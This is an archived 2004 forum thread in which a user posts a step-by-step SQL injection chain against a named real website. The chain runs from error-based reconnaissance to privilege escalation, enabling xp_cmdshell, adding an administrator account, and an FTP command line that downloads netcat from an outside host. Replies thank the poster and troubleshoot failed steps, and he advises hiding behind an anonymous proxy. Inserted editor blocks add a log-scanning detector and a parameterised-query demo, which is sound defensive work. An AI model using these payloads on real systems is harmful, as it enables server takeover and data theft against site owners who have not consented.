Waraxe IT Security Portal  
www.waraxe.us Forum Index -> Sql injection

DO u think u know everything about sql injection heh?
Posted: Mon Dec 27, 2004 6:53 pm by r0ot (Regular user; joined Jul 18, 2004; posts: 15)

Sorry, I was missing from here for almost a year.. but I'm back..

SQL INJECTION GATHERED FROM MASTERVN
REVISION 0.1
RELEASE A

EXAMPLE TO USE:
http://www.nhaxinh.com.vn/FullStory.asp?id=1

Exploiting the hole:
http://www.nhaxinh.com.vn/FullStory.asp?id=1'

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840

VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--

Code:
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright © 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840

SERVER NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840

DATABASE NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840

USER
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)--

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840

OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840

GUEST = DB_OWNER :DDD
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--

Code:
No result expected, normal page loading
Enables us to do some nice stuff like xp_regwrite and xp_cmdshell

ADDING TO "BUILTIN\ADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--

and then

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --

ENABLE OPENROWSET/OLEDB
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'

ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')

!! PAY ATTENTION TO THE SERVER= PARAMETER

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840

If it doesn't work, try:
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--

NOW SCRIPT KIDDIES

http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == "%")

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840

C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
203.162.7.70 == panvietnam.com

http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")

Code:
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye

UPLOAD NETCAT
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")

Code:
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f

http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840

Enjoy and happy SQL injection guys

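Added from the defender's side, not part of r0ot's post: a log scanner that URL-decodes web-server query strings (repeatedly, so the %25 double-encoding used above is caught) and reports which stage of the chain in the post a request matches, from the first quote probe to xp_cmdshell. The log format, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style log lines (not from the post); the query strings imitate the payload shapes above.
SAMPLE_LOG = """\
2004-12-27 18:53:01 10.0.0.5 GET /FullStory.asp id=1 200
2004-12-27 18:53:09 10.0.0.5 GET /FullStory.asp id=1' 500
2004-12-27 18:53:20 10.0.0.5 GET /FullStory.asp id=1%20and%201=convert(int,@@version)-- 500
2004-12-27 18:54:02 10.0.0.5 GET /FullStory.asp id=1;select%20*%20from%20openrowset('sqloledb','';;,'')-- 500
2004-12-27 18:55:10 10.0.0.5 GET /FullStory.asp id=1;exec%20master..sp_addsrvrolemember%20'x',sysadmin-- 200
2004-12-27 18:56:30 10.0.0.5 GET /FullStory.asp id=1%2520and%25201=convert(int,(select%2520top%25201%2520b%2520from%2520t))-- 500
2004-12-27 18:57:00 10.0.0.9 GET /FullStory.asp id=42 200
"""

# One signature per stage of the chain in the thread, most severe first, so a
# request is reported at the highest stage it matches.
SIGNATURES = [
    ("command_execution", re.compile(r"xp_cmdshell|sp_addextendedproc|xp_regwrite|xp_regdeletevalue")),
    ("privilege_escalation", re.compile(r"sp_addsrvrolemember|sp_msdropretry|sysxlogins|sysusers")),
    ("linked_server_abuse", re.compile(r"openrowset\s*\(\s*'sqloledb'")),
    ("error_based_recon", re.compile(r"convert\s*\(\s*int\s*,|@@version|@@servername|db_name\s*\(|system_user")),
    ("quote_probe", re.compile(r"'$|'\s*--|'\s*;")),
]

def normalize(query: str, max_rounds: int = 3) -> str:
    """URL-decode until stable (bounded, so %2520 -> %20 -> space is caught), then lowercase."""
    for _ in range(max_rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query.lower()

def classify(query: str):
    """Return the most severe stage the decoded query string matches, or None if clean."""
    text = normalize(query)
    for stage, pattern in SIGNATURES:
        if pattern.search(text):
            return stage
    return None

def scan_log(log_text: str):
    """Return (timestamp, client, path, stage) for every suspicious request in the log."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()  # date time client method path query status
        stage = classify(parts[5]) if len(parts) >= 7 else None
        if stage is not None:
            findings.append((f"{parts[0]} {parts[1]}", parts[2], parts[4], stage))
    return findings
```

The 500 status codes in the sample mirror what the verbose ODBC errors in the post produce; a run of them from one client, with the stage climbing over minutes, is the pattern worth alerting on.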
Posted: Mon Dec 27, 2004 9:18 pm by Postal (Regular user; joined Dec 24, 2004; posts: 5; location: Latvija)

Nice to see you back!

And thanks for this!

_________________
Born to learn!!!
Posted: Mon Dec 27, 2004 10:43 pm by any2000 (Active user; joined Dec 02, 2004; posts: 26)

Very, very many thanks for this
Posted: Mon Dec 27, 2004 11:44 pm by r0ot (Regular user; joined Jul 18, 2004; posts: 15)

heheh, it's nice to come back again.. I spent the whole year studying a lot and, more important, improving my SQL admin / dev skills; as you can see above I've got much to learn... :/ duh

Comments about the code, variations of it, etc. are appreciated.

Regards
Posted: Wed Dec 29, 2004 5:15 pm by ReFleX (Active user; joined Nov 05, 2004; posts: 39; location: ARGENTINA!)

Hi! A very good job. I was trying it, but I get this error when I execute the last injections:

Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'BUILTIN\Administrators'.

Does somebody know why this could be??
Posted: Thu Dec 30, 2004 11:51 am by r0ot (Regular user; joined Jul 18, 2004; posts: 15)

Some of the beginning queries didn't work out, so you couldn't add a user to the users... :/ bad.. Try to review the queries and re-exec them; remember, always try to use a good anon proxy.
Posted: Sun Feb 13, 2005 11:05 am by dairy123 (Beginner; joined Feb 13, 2005; posts: 4)

That was an extremely cool tut - so much thanks, r0ot.
Just in time, as I was losing sleep trying to figure out which sys tables, SPs and XPs to use. You saved me so many nights!!

Looks like I am getting the same message:
Login failed for user 'BUILTIN\Administrators'.

The SQL admin seems to be a bit knowledgeable - disabled select on the password column of sysxlogins.
Any thoughts on how I can elevate the user's privileges?
Thanks much
Posted: Tue Nov 01, 2005 7:13 am by linzi (Beginner; joined Nov 01, 2005; posts: 4)

Very good, I have learned more SQL injection skills from yours.
Posted: Thu Dec 08, 2005 11:46 am by goblin (Regular user; joined Nov 03, 2005; posts: 8)

Thx, you have a job! I am learning it now. So if someone wants to do injection like that, you must master ODBC.
Posted: Tue Dec 20, 2005 9:22 pm by vcore (Regular user; joined Jun 28, 2005; posts: 13)

Thank you. Two questions:
What's the difference between AND and &?
And when I put 1 and 1=convert(int,@@version)-- I get a "type mismatch" (generally CInt); how should I fix this?
Sorry for my English.
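As an added example from the editor, not code from the thread, the three ways a page like FullStory.asp can build its query, with SQLite standing in for SQL Server: the concatenated form turns a trailing quote into a syntax error exactly as the first step of the post shows, while a bound parameter or an integer cast (which is what a CInt "type mismatch" indicates) treats the same input as harmless data. Table name, rows and function names are constructed for the example.

```python
import sqlite3

# SQLite stands in for SQL Server: the failure modes are the same, only the error
# text differs. The table and its two rows are constructed for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table story(id integer primary key, title text)")
    conn.executemany("insert into story values (?, ?)", [(1, "first"), (2, "second")])
    return conn

def fetch_concat(conn, raw_id: str):
    """Vulnerable shape: the id parameter is spliced into the SQL text, so a stray
    quote becomes a syntax error and ' or 1=1' becomes part of the query."""
    return [row[0] for row in conn.execute("select title from story where id=" + raw_id)]

def fetch_param(conn, raw_id: str):
    """Hardened: a bound parameter is always data, never SQL."""
    return [row[0] for row in conn.execute("select title from story where id=?", (raw_id,))]

def fetch_cast(conn, raw_id: str):
    """Hardened: integer whitelist, the CInt-style cast that a 'type mismatch' hints at."""
    try:
        safe_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return [row[0] for row in conn.execute("select title from story where id=?", (safe_id,))]

def probe(conn, fetcher, raw_id: str):
    """Run one fetcher and report either its rows or the error text the client would see."""
    try:
        return ("rows", fetcher(conn, raw_id))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1 or 1=1"):
        for fetcher in (fetch_concat, fetch_param, fetch_cast):
            print(f"{fetcher.__name__:12} id={value!r:11} -> {probe(db, fetcher, value)}")
```

The cast variant fails closed with an application-side message, which is why the page that gave vcore a CInt error never reached the database with the payload.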
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"